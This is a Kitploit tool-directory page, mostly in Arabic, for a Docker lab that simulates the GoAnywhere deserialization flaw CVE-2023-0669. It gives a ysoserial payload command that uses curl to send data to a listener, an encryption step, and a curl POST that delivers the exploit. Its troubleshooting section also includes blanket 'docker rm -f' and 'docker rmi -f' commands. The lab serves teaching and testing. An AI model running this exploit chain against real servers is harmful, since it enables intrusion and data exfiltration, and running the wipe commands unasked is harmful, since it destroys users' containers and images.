Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2023-0669-simulation — بيئة محاكاة لـ CVE-2023-0669 مع حاويات Docker للمهاجم والخادم الضعيف والمستمع. توضح توليد استغلال إلغاء التسلسل وتشفير الحمولة وسرقة البيانات. | Kitploit
أدوات/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتالقيادة والسيطرة
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

بيئة محاكاة لـ CVE-2023-0669 مع حاويات Docker للمهاجم والخادم الضعيف والمستمع. توضح توليد استغلال إلغاء التسلسل وتشفير الحمولة وسرقة البيانات.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
7منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

هيكل المشروع

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← créé automatiquement (exfiltration)

2. شغّل الحاويات الثلاث (المهاجم، الضعيفة، المستمع)

docker-compose up --build

المشكلة: خطأ KeyError: 'ContainerConfig' عند docker compose up

يتطلب هذا المشروع:

  • Docker Engine: v24 أو v25 كحد أدنى
  • Docker Compose: v2.20+ (مضمّن تلقائيًا مع Docker) KeyError: 'ContainerConfig' عند تشغيل docker compose up. يعود ذلك عادةً إلى بيانات Docker الوصفية القديمة أو التالفة، أو الصور القديمة. احذف الحاويات والصور والبيانات الوصفية التالفة:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

ثم أعد البناء بشكل نظيف:

docker compose build --no-cache

docker compose up

3. ادخل إلى حاوية المهاجم

docker exec -it attacker bash

توليد الحمولة الآمنة (يرسل رسالة فقط)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Chiffrement du payload

java CVE_2023_0669_helper payload.ser 1

→ Copie toute la longue chaîne qui s’affiche (Ctrl+A puis Ctrl+C)

Envoi de l’exploit (remplace LA_CHAINE par ce que tu viens de copier)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. النتيجة الفورية

سترى في سجلات الـ listener (أو في المجلد ./received على جهازك):

PWNED ! تم استلام 42 بايت → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

تنزيل الأداة